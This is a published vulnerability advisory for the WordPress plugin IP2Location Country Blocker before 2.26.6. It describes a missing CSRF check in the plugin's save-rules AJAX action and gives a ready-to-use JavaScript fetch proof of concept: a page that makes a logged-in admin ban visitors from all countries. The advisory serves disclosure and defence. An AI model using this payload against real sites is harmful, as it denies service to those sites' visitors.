WordPress Plugin Vulnerabilities
IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF
Description
The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.
Proof of Concept
Make an admin open a page with the following code in it, which will ban visitors from all countries: fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}), "method": "POST", "credentials": "include" }) .then(response => response.text()) .then(function(data) { console.log(data); });
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-06 (about 2 years ago)
Added
2022-01-06 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)